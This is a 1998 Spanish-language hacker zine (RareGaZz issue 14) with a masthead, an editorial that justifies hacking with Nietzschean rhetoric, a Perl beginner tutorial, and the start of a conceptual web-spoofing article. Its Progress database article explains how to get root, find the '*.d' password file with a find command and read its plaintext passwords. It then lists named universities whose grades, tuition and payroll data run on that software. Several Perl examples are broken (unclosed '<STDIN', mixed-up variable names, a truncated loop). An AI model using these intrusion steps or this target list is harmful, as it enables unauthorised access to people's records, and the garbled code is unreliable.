Copy Link
Add to Bookmark
Report
RareGaZz Issue 14
----------------------------------------------------
A¤o 2/Numero 14 ³ Septiempre de 1998
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
³
----------------------------------------------------
ooooooo oo ooooooo oooooo ooooo oo oooooo oooooo
$$""$$" o$"$$ $$""$$" $$ o$$""o, o$"$$ """$$ """$$
$$o$$" $$ $$ $$o$$" $$$$$$ $$ $$ $$ $$ $$ $$
$$$$$ $$ $$ $$$$$ $$"""" "$o $$ $$ $$ $$" $$"
$$" $$ $$$$$$$ $$" $$ $$ "$o $$ $$$$$$$ o$" o$"
$$ "$$ $$ $$ $$ "$$ $$ooooo "$o$$ $$ $$ o$$oooo o$$oooo
"" """ "" "" "" """ """"""" "" "" "" """"""" """""""
----------------------------------------------------
³
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
"La verdad nos hara libres"
----------------------------------------------------
Editor: Cytorax y Azumlord
Co-editores: Azumlord y GuyBrush
RareGaZz Team : 12r, Arkangel, AzumLord, Cytorax
Grovvy, Guybrush, KillerBot
Mr.X, Orion, PaTa, RareTrip,
Senpai, ServerHacker, Vov_77
y Yo_soy.
Agradecimientos: Jhocker, Mr.Nexus, Barbwired/Freedom
Distribuidores Oficiales: raregazz.islatortuga.com
raregazz.acapulco.uagro.mx
E-mail Ofical: raregazz@iname.com
Saludos (Oficiales): #RaZa MeXicaNa Team, X-ploit Team,
MEMR, LIZA.
Frase del Dia (Oficial): "ip!, ip!, echame las otras" Azumlord
despues de una mala noche.
Rayadas de Madre (Oficiales): jmasojan, el lamer de mierda que borro
los archivos del ftp de la lista de los
RareDudeZz y el(los) idiota(s) lamer(s)
que avisaron a los de geocities sobre la
pagina de SET.
Comentarios (Oficiales): Mas vale tarde que nunca :-)
Ä[ E d i t o r i a l ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Hola de nuevo lector de esta espectacular revista. He decidido hacer esta
editorial, no como las convencionales, sino como una que nos ponga a pensar
un poco, una que nos haga recapacitar, conste que no quiero hacer cambiar de
forma de pensar a nadie, solo que den su punto de vista.
Por ejemplo todos no atacamos contra todos sin saber la explicacion de lo
que es el bien o de lo que es el mal, muchos acusan a los hackers de ser gente
"mala" pero que es a lo que ellos definen como malo, solo juzgan sin saber
estas importantes definiciones.
Primero, ¨que es el bien?, segun Federico Nietzsche es todo lo que eleva en
el hombre el sentimiento de la potencia, la voluntad de la potencia, la
potencia en si.
Ahora, ¨que es lo malo?, es todo cuyas raices residen en la debilidad. Como
una peque¤a conclusion Que los debiles y los fracasados perezcan!.
Bueno creo que con estas dos definiciones podemos empezar a defendernos, ya
que nosotros no hacemos nada malo solo queremos conocer mas, mas y mas a lo
nos lleva a una elevacion de nuestra potencia, que al contrario de hacer algo
malo como la gente dice o divulga, seria el ser una escoria unos debiles y
unos fracasados, que es lo que menos queremos ser y que talvez la gente que
nos acusa de malos tienen miedo a lo que sabemos, como dice en la oracion
anterior Que los debiles y los fracasados perezcan!, es asi como presento
esta revista, desde otro punto de vista, espero que les sirva de algo y
piensen antes de actuar.
Esto no fue un sermon o algo por el estilo, sigan adelante que la revista
esta EXCELENTE. NoS vEmOS lUeGO, y LoS dEjO cON eSTA fRaSE:
¨El amor en la familia en donde se da?
En el padre o en la Madre.
ÚÄÄ[ C o n t e n i d o s ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÄ´ ³
³ ³ +Editorial -----------------------> Cytorax ³
³ ³ +Progress ------------------------> Azumlord ³
³ ³ +Manual de Bolsillo de Perl ------> Cytorax ³
³ ³ +Web Spoofing --------------------> GuyBrush ³
³ ³ +Peligro en Windows --------------> Yo_Soy ³
³ ³ +Introduciendo tus exploits ------> Yo_Soy ³
³ ³ +Esteganografia ------------------> PaTa ³
³ ³ +Curso de Antivirus --------------> Jhocker ³
³ ³ +Back Orifice --------------------> Barbwired/FREEDOM ³
³ ³ +FuCKiNG TeLMeX ------------------> Juan Pablo ³
³ ³ +Reflexiones de Nadie ------------> Mr. Nexus ³
³ ³ +Bugs y Exploits -----------------> PaTa ³
³ ³ +Letz Hack -----------------------> Azumlord ³
³ ³ +Accediendo al IRC por telnet-----> Senpai ³
³ ³ +Cartas del Lector ---------------> GuyBrush ³
³ ³ +NotiLOONZ -----------------------> GuyBrush/Azumlord ³
³ ³ +Llaves PGP ----------------------> RareGaZz Staff ³
³ ³ +DESPEDIDA?? ---------------------> Cytorax/Azumlord ³
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
"El ser es, y el no ser no es"
Mi maestra de filosofia tratando de explicar ese dilema.
01010101010101010101010101010101010101010101010101010101010101010101010
10 01
01 #!/bin/RareGaZzsh 10
10 # La informacion contenida en este zine tiene fines completamente 01
01 # de entretenimiento y educativos, los autores de la informacion 10
10 # aqui presentada no se hacen responsables de los posibles da¤os 01
01 # que se puedan ocasionar...... 10
10 01
01010101010101010101010101010101010101010101010101010101010101010101010
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Progress -=( Azumlord )=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Ä[ D i s c l a i m e r ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
La informacion aqui presentada, tiene fines solamente educativos,
cualquier uso indebido de la informacion aqui contenida es responsabilidad
de usted! ( Demonios, eso lo dijeron en un comercial???), el autor no se
hace responsable de los da¤os materiales o psicologicos que sean producto
de un mal uso de lo aqui expuesto.
Ä[ L a H i s t o r i a ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Progress Software Corporation fue fundada en 1981 en Bedford,
Massachusetts, E.U.A: y es una compa¤ia lider en la oferta de bases de
datos, herramientas de desarrollo y soluciones empresariales "A Prueba del
Futuro", y para solucionar los problemas en los procesos de las empresas y
proveer Ventajas competitivas reales.
Progress Software se empezo a conocer en Mexico a partir de 1989 con la
distribucion de sus productos a traves de los siguientes distribuidores:
* 1989 - 1991 : Genetec, Dataflux
* 1991 - 1993 : Tecnologia en Desarrollo de Sistemas
(Actual Asociado en Aplicaciones Progress)
En 1993 debido al gran crecimiento y aceptacion de los productos Progress
en Mexico, la Corporacion decide establecer la representacion directa de la
compa¤ia, fundandose el 22 de febrero de 1993 la subsidiaria mexicana de
Progress Software Corporation.
Ä[ Q u e e s ? ? ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Progress es un lenguaje de programacion de cuarta generacion el cual
permite manejar grandes bases de bases de datos y dar soluciones a todos
los sectores de la industria, como son el sector de Manufacturera, Finanzas,
Distribucion, Salud, Gobierno, Comercio, Telecomunicaciones, Educacion, etc.
y mercados verticales como Contabilidad y Recursos Humanos.
Progress provee un ambiente para el desarrollo rapido de aplicaciones en
bases de datos relacionales y un conjunto de herramientas de desarrollo
graficas (GUI) y de modo caracter. Con Progress se desarrollan aplicaciones
empresariales para cliente/servidor y modo host, que son indepedientes de la
base de datos, el sistema operativo, y la interfaz de usuario.
Progress incorpora la tecnologia de objetos mediante componentes que
permiten fabricar y ensamblar aplicaciones rapidamente. Progress es facil de
aprender, las herramientas graficas de desarrollo guian al programador en su
esquema de desarrollo, el Progress 4GL es un lenguaje completo con el cual
no se requiere de la utilizacion de un lenguaje de tercera generacion para
programar tareas complejas.
Adicionalmente, una aplicacion desarrollada en Progress es facil de poner
en produccion, bajo consumo de recursos de maquina y gran portabilidad sobre
multiples plataformas tales como Unix, Windows, AS/400, y Novell.Igualmente,
una aplicacion desarrollada en Progress puede ser puesta en marcha sobre
otras base de datos distintas de Progress tales como Oracle, Sybase,
DB/2-400, SQL Server y ODBC-compliant.
Ä[ C o m o H a c k e a r l o ? ? ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Como ya vimos anteriormente, Progress es una herramienta que te permite
administrar con facilidad y *confiabilidad* grandes bases de datos, asi que
en la mayoria de los casos se restringira el acceso a estas bases de datos
utilizando un password y estableciendo determinados permisos a cada usuario
de estas bases de datos.
Tb. como ya se establecio anteriormente Progress es una herramienta con
la cual se generan apliaciones INDEPENDIENTES del Sistema Operativo, pero
suponiendo que el Progress se este corriendo bajo un ambiente Unix, lo que
tendrias que hacer es obtener root en ese sistema o por lo menos un usuario
con permisos de administrador, despues de que ya hayas obtenido alguno de
los dos, viene lo mas sencillo, encontrar el archivo de passwords, esto
sera algo sencillo si tomamos en cuenta que puede tener cualquier
nombre pero su terminacion tiene que ser *.d, de tal manera que puedes
ejecutar este comando para encontrarlo.
#find / -name *.d -print
En este caso el archivo tenia un nombre muy obvio usuario.d y su contenido
es el siguiente:
"administrador" "Administrador del Sistema" "adm000.p" "per001" "1" "Eureka"
|-----1-----| |---------2------------| |---3---| |--4--| |5| |--6--|
1.- Nombre de Usuario
2.- Informacion adicional sobre el usuario
3.- Rutina para verificar el passwd
4.- Perfil del usuario algo asi como el .profile
5.- Privilegios del usuario.
6.- Password
Como se puede ver cada campo esta separado por comillas y un espacio en
blanco, ademas el password aparece desencriptado };-)
NOTA: Como ya comente anteriormente el Progress es todo un lenguaje de
programacion, es decir, en algunos casos los administradores pueden
cambiar la rutina que verifica el password, o agregar algun metodo
de encriptacion del mismo. PERO al parecer todas las instituciones,
empresas u organizaciones que adquieren el Progress reciben un curso
de capacitacion, el cual es el mismo para TODOS, si, si ya se que se
estaran preguntando y eso que????, pues si el curso es el mismo para
todos quiere decir que estaran usando rutinas muy semejantes a las
que expuse, quiero agregar que yo lo probe en dos instituciones
diferentes y usaban el mismo metodo :-)
Ä[ Q u i e n l o u s a ? ? ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Como ya se habran dado cuenta, Progress es una herramienta muy versatil,
y es usado en todos los sectores de la industria, pero no estaria nada mal
saber quien lo usa exactamente, jeje bueno pues he aqui una lista muy buena,
de las Universidades que usan esta "oh!, gran herramienta" };-)
Fue una verdadera pena solo encontrar las Universidades que utilizaban
esta herramienta, me hubiese gustado haber encontrado tambien a las empresas
e instituciones que utilizan el Progress. :-(
ITAM
http://www.itam.mx
ITESM (10 campus)
http://www.sistemas.itesm.mx
UNIVERSIDAD DE LAS AMERICAS (UDLA)
http://www1.udla.mx/index.html
UNIVERSIDAD POPULA AUTONOMA DEL ESTADO DE PUEBLA (UPAEP)
http://www.pue.upaep.mx
UNIVERSIDAD LA SALLE
http://www.ulsa.mx
UNIVERSIDAD CHAPULTEPEC
http://www.univchapultepec.edu.mx
UNIVERSIDAD LATINOAMERICANA (ULA)
http://www.ulanet.mx
UNIVERSIDAD DEL VALLE DE MEXICO (7 CAMPUS)
INSTITUTO TECNOLOGICO DE CELAYA
UNIVERSIDAD VERACRUZANA
INSTITUTO POLITECNICO NACIONAL (C.I.C)
UNIVERSIDAD IBEROAMERICANA GOLFO CENTRO
http://www.uiagc.pue.uia.mx
UNIVERSIDAD AMERICANA DE ACAPULCO
http://www.uaa.edu.mx
CENTRO NACIONAL DE INVESTIGACION Y DESARROLLO TECNOLOGICO
UNIVERSIDAD LATINA DE AMERICA
UNIVERSIDAD ISEC
INSTITUTO DE ESTUDIOS SUPERIORES DE TAMAULIPAS
http://www.iest.mx
UNIVERSIDAD KINO
http://www.unikino.mx
UNIVERSIDAD AUTONOMA DE NUEVO LEON
http://www.dsi.uanl.mx
UNIVERSIDAD DEL NORTE
http://www.uninorte.edu.com
UNIVERSIDAD REGIOMONATANA
http://www.ur.mx
Que!!!!!!!!??????????, que porque las Universidades adquirieron el
Progress???, lo adquirieron para manejar cosillas sin importancia como son
las calificaciones y colegiaturas de los alumnos, nominas de los maestros,
y cosas por el estilo....... ;-)
Ä[ D e s p e d i d a ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Pues bien eso es todo, son las 2:43 a.m. y tengo un sue¤o de la chingada
ah!!!, casi lo olvido quiero pedir disculpas por el uso repetitivo de
las palabras tales como, "Como" y similares............
-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\
-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//
\ /
Por: Cytorax \ MANUAL DE BOLSILLO DE PERL I / Cytorax@BigFoot.com
\ /
http://members.xoom.com/cytorax/
http://members.tripod.com/~cytorax/
INTRO
Perl que significa "Practical Extraction and Report Language" es un
lenguaje de programacion medianamente nuevo, el cual surgio de otras
herramientas de UNIX como son : sed,grep,awk,c-shell. Principalmente sirve
para labores de procesamiento de texto, lo cual lo hace en una forma facil y
clara, no como es en C o Pascal; tambien sirve para la programacion de
software de sistemas; y ahora ultimo se ha consolidado como "el" lenguaje
para programar aplicaciones para WWW, por ejemplo un programa que ponga en
pantalla las notas de un alumno dada su matricula, etc. Por todas estas
potencialidades es que estudiaremos Perl.
Nuetro primer programa sera el ya tipico, que imprime Hola, Mundo! :
#!/usr/local/bin/perl
print "Hola, Mundo!\n";
La primera linea lo que hace es llamar al compilador de Perl.
La segunda linea imprime Hola, Mundo! y un cambio de linea(\n).
Debemos decir que todas las lineas (salvo contadas excepciones) de un programa
en Perl terminan con ';' .
Veamos un programa ahora en el cual se interactua con el usuario :
#!/usr/local/bin/perl
print ("Cual es tu nombre?");
$nombre=<STDIN;
chop($nombre);
print "Hola, $nombre!\n";
En la segunda linea igual que antes se imprime un mensaje, pero ahora vemos
que esta con '()', estos son opcionales. En la siguiente linea se introducen
dos nuevos conceptos, primero el de variable ($name),- en el STAGE I
veremos que las variables (escalares) empiezan con '$'-; <STDIN lo que indica
es que se leera una linea desde la entrada estandard. En la cuarta linea la
funcion chop() lo que hace es sacarle el ultimo caracter a $name, es decir le
quita el Enter (cambio de linea). Y finalmente en la ultima linea lo
saludamos, en esta vemos que $name toma el valor que se le ingreso.
Veamos un programa en el cual se eligen opciones :
#!/usr/local/bin/perl
print ("Cual es tu nombre?");
$nombre=<STDIN;
chop($nombre); # saca el enter a la linea leida
if ( $name eq "Claudio")
{
print "Hola, Claudio! Como estas!\n";
}
else
{
print "Hola, $nombre\n";
}
En la tercera linea vemos el caracter '#' que significa comentario.En la
quinta linea se introduce el if, el cual mediante el eq compara dos strings:
$name y "Claudio"; hay que hacer notar que el cuerpo del if siempre va entra
llaves(aunque sea una linea), al igual que el else, el cual significa que se
imprime "Hola, $name\n" si no se cumplio la condicion del if.
Un ultimo programa, en el cual se introducen los ciclos:
#!/usr/local/bin/perl
print ("Cual es tu nombre?");
$nombre=<STDIN;
chop($nombre);
$palabrasec="llama";
if ( $name eq "Claudio")
{
print "Hola, Claudio! Como estas!\n";
}
else
{
print "Hola, $nombre\n";
print "Cual es la palabra secreta?";
$palabra=<STDIN;
chop($opcion);
while ( $palabra ne $palabrasec )
{
print "Error, intentalo de nuevo, cual es la palabra secreta?";
$palabra=;
chop($palabra);
}
}
En la 16a linea usamos el while, el cual al igual que en otros lenguajes
significa que las lineas entre las llaves se repetiran mientras sea verdadera
la condicion, la cual en este caso pregunta si $palabra no es igual a
$palabrasec.
STAGE I
Datos escalares
En Perl existen dos tipos de datos, numeros y strings, pero entre los numeros
estan los enteros y los reales.
Ej: 4,7.5,"hola"
Float : Ej: 1.25,4.25e45,-6.5e24,-1.2E-23
Integer : Ej: 12,15,-2004,3485
0377 # 377 octal <= 255 decimal
-0xff # ff negativo en hexadecimal <= -255 decimal
Strings : Ej: "hola",'Como estas'
Para senalar los strings hay dos formas de hacerlo:
· Single quoted :
Ej:'hola' # h,o,l,a
'don\'t' # d,o,n,',t
'' # string nulo
'donde\\vas' # d,o,n,d,e,\,v,a,s
'hola\n' # h,o,l,a,\,n
'hola
tu' # h,o,l,a,[enter],t,u ( 11 caracteres )
· Double quoted
Ej:"hola mundo\n" # hola mundo[enter]
"cola\tsprite" # cola[tab]sprite
Como vimos en estos ejemplos en los double quoted strings, se reconocen cosas
como \n,\t,etc. mientras que con single quoted no, pero tiene la ventaja de
poder escribirse literalmente lo que se pone entre ellos.
Operadores
Numeros :
Ej:2+3 # 5
5.1-2.4 # 2.7
3*12 # 36
2**3 # 8
Strings : a) Concatenacion(.):
Ej:"Hola"."mundo" # "Holamundo"
"juan"." "."pedro" # "juan pedro"
b) Operador de repeticion de strings(x) :
Ej:"juan"x3 # "juanjuanjuan"
"pedro"x(4+1) # "pedropedropedropedropedro"
c) Operadores de comparacion :
Numeros Strings
== eq
!= ne
< lt
gt
<= le
= ge
Conversion entre números y strings
"123.45juan" # si es operado como numero toma el valor 123.45
Ej: $a="3b";
$b=$a+5; # $b=8
Conversion al reves :
Ej: $a=5;
"x".$a # "x5"
Variables escalares
Una variable escalar es un nombre que mantiene un valor, en Perl las variables
deben empezar con '$' .
Ej:$a,$nombre
Operadores
Ej:$a=17;
$b=$a+3;
$b=$b*2;
$a=4+($a=3); # $b=7,$a=3
$d=$c=5;
Interpolacion de variables escalares en strings
Si una variable es puesta en un string double quoted (") se interpola el valor
de la variable.
Ej:$a="juan";
$b="hola $a"; # $b="hola juan"
Y si una variable se pone entre single quoted (') no se interpola el valor de
la variable.
Ej: $x="hola";
$y='$x amigo'; # asigna '$x amigo a $y
En los strings existen tambien algunos modificadores: \U,\u,\L
Ej: $mayjuan="\Ujuan"; # $mayjuan="JUAN"
$juan="juan"; $mayjuan="\U$juan"; # $mayjuan="JUAN"
$capjuan="\u$juan"; # $capjuan=Juan
$pedro="\LPEDRO"; # $pedro="pedro"
$cappedro="\u\LPEDRO"; #cappedro="Pedro"
$maypedro="PEDRO"; $cappedro="\u\L$maypedro"; # $cappedro="Pedro"
<STDIN como valor escalar
$a=<STDIN lee una linea de la entrada estandard y la guarda en $a
Salida con print
print("Hola Mundo\n"); <= print "Hola Mundo\n";
El valor undef
Que pasa si usamos una variable antes de darle un valor ? , nada fatal, se
asigna como cero si es numero 0 "" si es como string.
Ej: $a=3;
$b=$a+$c; # $b=3
$x="hola";
$y=$x.$z; # $y="hola"
STAGE II
Arreglos
Un arreglo es una lista ordenada de datos escalares. Los arreglos pueden tener
cualquier numero de elementos.
Representacion literal
Un arreglo es una lista de valores separados por coma y dentro de parentesis.
Los valores de los elementos pueden ser de distinto valor.
Ej: (1,2,3)
("juan",4.5)
Sus valores no necesariamente tienen que ser constantes, puede tener
variables.
Ej: ($a,17)
($b+$c,$d+$e)
El arreglo vacio es representado por () .
Variables
Asi como las variables escalares se representan con un '$' al comienzo, las
variables de tipo arreglo empiezan con '@'.
Ej: @a , @hola
Operadores
Asignamiento:
Mediante el operador '=' le podemos dar a una variable arreglo un valor.
Ej:@a=(1,2,3);
@b=("yo","tu",2);
@c=@a; # copia el arreglo @a en @c
@d=($x,$y);
El largo de un arreglo ( ej : @a ) queda guardado en $#a.
Acceso a los elementos
Para enumerar los elementos de un arreglo se empieza desde el 0. El primer
elemento del arreglo @a es $a[0], vemos que para accesar un elemento
especifico del arreglo ya no se ocupa '@'.
Ej: @a=(7,8,9);
$b=$a[0]; # asigna 7 a $b
$a[1]=5; # ahora @a es (7,5,9)
$a[2]++; # suma uno al tercer valor de @a siendo ahora (7,5,10)
$c=$a[0]+$a[1];
Hasta ahora solo hemos visto que los indices de los arreglos son constantes,
pero tambien pueden ser variables.
Ej:@juan=(7,8,9);
$a=2;
$b=$juan[$a];
$c=$juan[$a-1]; # $c=8
$d=$a[$#a]; # $d=9
Si uno accesa un elemento del arreglo mas alla del fin del arreglo el valor
undef es retornado.
Ej: @a=(1,2,3);
$b=$a[7]; # $b es 0 o "" , dependiendo del contexto
Asignar un valor a un elemento ams alla del fin del arreglo, lo que hace es
agrandar el arreglo poniendo undef a los valores intermedios.
Ej: @a=(1,2,3);
$a[3]="hola"; # @a es ahora (1,2,3,"hola")
$a[6]="chao"; # @a es ahora (1,2,3,"hola",undef,undef,"chao")
Push y Pop
Una comun utilizacion de los arreglos es como stacks, donde los nuevos valores
son agregados y borrados por el lado derecho del arreglo. Push() es utilizado
para agregar elementos y pop() para sacar.
Ej: @lista=(1,2,3);
push(@lista,5); # @lista=(1,2,3,5)
$a=pop(@lista); # $a=5, @a=(1,2,3)
Shift y Unshift()
Al igual que Pop y Push estos sacan y meten elementos de un arreglo, pero lo
hacen por el lado izquierdo.
Ej: @a=(1,2,3);
unshift(@a,0); # @a=(0,1,2,3);
$x=shift(@a); # $x=0 , @a=(1,2,3)
unshift(@a,5,6,7) # @a=(5,6,7,1,2,3)
El Operador reverse
reverse() invierte el orden de los elementos de un arreglo, retornando la
lista invertida.
Ej: @a=(1,2,3);
@b=reverse(@a); # @b=(3,2,1)
@c=reverse(1,2,3); # lo mismo
Notemos que la lista que se le pasa como parametro permanece inalterable. Si
nosotros queremos dejar la lista invertida ahi mismo debemos hacer :
@a=reverse(@a).
Sort
Sort toma una lista y la ordena ascendentemente ( segun codigo ASCII ) y
retorna la lista ordenada.
Ej: @a=sort("grande","peque¤o","chico"); # @a=("chico","peque¤o","grande");
@b=(1,2,4,8,16,32,64);
@c=sort(@b); # @c=(1,2,16,32,4,64,8)
Como vemos en este ultimo ejemplo sort()ordena por strings, no numericamente.
Chop
chop() trabaja igual que en variables escalares, le saca el ultimo caracter a
cada elemento del arreglo.
Ej: @a=("hola","mundo\n","felices dias");
chop(@a); # @a=("hol","mundo","felices dia")
<Stdin como arreglo
<STDINretorna la siguiente linea de input de la entrada estandard y lo hace en
un con texto escalares decir :
$x=<STDIN; # $x guarda un string , una linea leida de la entrada estandard
Tambien se puede usar en un contexto de arreglo :
@a=<STDIN; # lee todas las lineas de la entrada estandard y guarda cada linea
en un elemento del arreglo @a.
STAGE III
Estructuras de control
Al igual que en la mayoria de los lenguajes de programacion , en Perl existen
estructuras como if, for, while.
If, Elseif, Else
La estructura de un if es la siguiente :
if ( .... ) {
......;
......;
}
elsif ( .... ) {
......;
......;
}
elsif ( .... ) {
......;
......;
}
else ( .... ) {
......;
......;
}
Notemos que los elsif y el else van solo si el usuario desea varias preguntas,
se podria usar por ejemplo :
if ( $a < 18 )
{
print "Tu eres menor de edad\n";
}
else
{
print "Eres un adulto\n";
}
o :
if ( $a == 0 )
{
$ind++;
print "Incorrecto\n";
}
Digamos tambien que aunque sea una instruccion por if debe ir entre llaves.
While y Until
La forma del while es :
while ( condicion ) {
....;
....;
}
Lo que esta entre llaves se ejecuta mientras sea veradera la condicion.
Ej: print "Cuantos a¤os tienes?";
$a=<STDIN;
chop($a);
while ( $a 0 )
{
print "El a¤o pasado tenias $a a¤os\n";
$a--;
}
La forma del until es :
until ( condicion ) {
...;
...;
}
A diferencia del while el until se ejecuta al menos una vez , y se sigue
mientras la condicion sea falso , es decir es similar al Repeat/Until de
Pascal.
For
La forma general del for es :
for ( exp_inicial; exp_testeo; exp_increm){
...;
...;
}
Ej: for ( $x=0;$x<10;$x++)
{
print "Llevas $x puntos\n";
}
Foreach
El foreach de Perl es muy similar al de C-shell , recibe una lista de valores
y asigna cada uno de los valores de la lista a una variable de lectura . La
estructura del foreach es :
foreach $a ( @alguna_lista ) {
...;
...;
...;
}
Ej:@a=(3,5,7,9);
foreach $x (@a) {
$y=$x*3;
print "$y\n";
}
Imprime 9,15,21,27 .
STAGE IV
Lectura de Archivos y Entrada Estandar
Entrada Estandard
Como ya dijimos para leer una linea desde la entrada estandard se debe asignar
una variable escalar a <STDIN
Ej:$a=<STDIN; # guarda en $a la linea leida
chop($a); # le sacamos el enter que tienen todas las lineas por su ingreso
Como procesar toda la entrada estandard ?:
while ( $a=<STDIN )
{
manejo de la linea leida ..... ;
}
El while termina cuando ya no encuentra una linea ingresada desde la entrada
estandard.
Otra forma de hacer esto ultimo ( procesar toda la entrada est. ) es asignar
<STDIN a una variable de tipo arreglo Ej : @b=<STDIN ; # en $b[0] guarda la 1a
linea, en $b[1] la 2a ....
Lectura de Parametros Pasados a un Programa
Dentro de un programa en Perl los argumentos que se le pasan quedan guardados
en el arreglo @ARGV .
Ej: %vi prog1.pl
#!/usr/local/bin/perl
print "Tu ingresaste las palabras:\n";
for($x=0;$x
DESPEDIDA
Bueno espero que les halla gustado este breve cursillo en la proxima
revista, seguiremos con este manual pero introduciendonos mas en el tema, osea
sere mas profundo y un poco mas complicadillo, pero no te preocupes hay viene
lo bueno, claro que me falto informacion, pero por falta de tiempo, salud
entre otras cosas no pude profundizar esta vez pero mantente al tanto.
MI LLAVE PGP
Localizada en su debido apartado =) .
_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m_m
-w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w--w-
&&&&&&&&&&&&&&&&&&&&&&&
&& Web Spoofing &&
&&&&&&&&&&&&&&&&&&&&&&&
Introduccion
------------
Este documento describe un ataque de seguridad en Internet que puede
poner en peligro la privacidad de los usuarios de la World Wide Web y la
integridad de sus datos. El ataque puede ser llevado a cabo en los
sistemas de hoy en dia, poniendo en peligro a los usuarios de los navegadores
mas comunes, incluyendo el Netscape Navigator y el Microsoft Internet
Explorer.
El Web Spoofing permite a un atacante crear una "copia sombra/shadow copy" de
toda la World Wide Web. Los accesos a la Web shadow son encauzados por la
maquina del atacante, permitiendo a este monitorizar todas y cada una de
las actividades de la victima incluyendo las entradas de passwords o
numeros de cuenta que haga este. El atacante puede tambien hacer que datos
falsos o enga¤osos sean enviados a servidores Web en nombre de la victima,
o a la victima en nombre de cualquier servidor Web. Resumiendo, el atacante
observa y controla todo lo que la victima hace en el Web.
Ataques Spoofing
----------------
En un ataque spoofing, el atacante crea un contexto enga¤oso para asi
enga¤ar a la victima de forma que haga una decision relacionada con la
seguridad inapropiada. Un ataque spoofing es como una estafa: el atacante
monta un mundo falso pero convincente alrededor de la victima. La victima hace
algo que podria ser apropiado si el falso mundo fuese real.
Desafortunadamente, las actividades que parecen razonables en el falso
mundo podrian tener efectos desastrosos en el mundo real.
Los ataques spoofing son posibles tanto en el mundo fisico como en el
electronico. Por ejemplo, ha habido varios incidentes en los que los
criminales ponen maquinas expendedoras falsas, normalmente en areas
publicas de grandes almacenes [1]. Las maquinas aceptan las tarjetas ATM y
piden a la persona que meta su codigo PIN. Una vez que la maquina tiene
el codigo PIN de la victima, puede o bien tragarse la tarjeta o
"malfuncionar" y devolver la tarjeta. En cualquiera de los casos, los
criminales tenian suficiente informacion para copiar la tarjeta de la victima
y usar el duplicado. En estos ataques, la gente era enga¤ada por el
contexto que veian: la localizacion de las maquinas, su tama¤o y peso,
la forma en que estaban decoradas, y la apariencia de sus pantallas
electronicas.
La gente que usa sistemas informaticos a menudo toma decisiones relacionadas
con la seguridad basadas en indicaciones contextuales que ven.
Por ejemplo, puedes decidir teclear tu numero de cuenta banacario por que
crees que estas visitando la Web page de tu banco. Esta creencia puede surgir
por que la pagina tiene un aspecto familiar, por que el URL del banco aparece
en la linea de localizacion del navegador, o por otras razones.
Para apreciar el rango y severidad de posibles ataques spoofing, debemos
profundizar en dos partes de la definicion de spoofing: decisiones
relacionadas con la seguridad y contexto.
Decisiones relacionadas con la seguridad
----------------------------------------
Por "decisiones relacionadas con la seguridad", queremos decir cualquier
decision que toma una persona que pueda llevar a resultados no deseados como
una violacion de la privacidad o manejo no autorizado de datos. El decidir
divulgar informacion sensible, como por ejemplo tecleando un password o un
numero de cuenta, es un ejemplo de una decision relacionada con la
seguridad.
Elegir el aceptar bajar un documento es una decision relacionada con la
seguridad, ya que en muchos casos un documento bajado es capaz de
contener elementos maliciosos que da¤an a la persona que recibe el
documento [2].
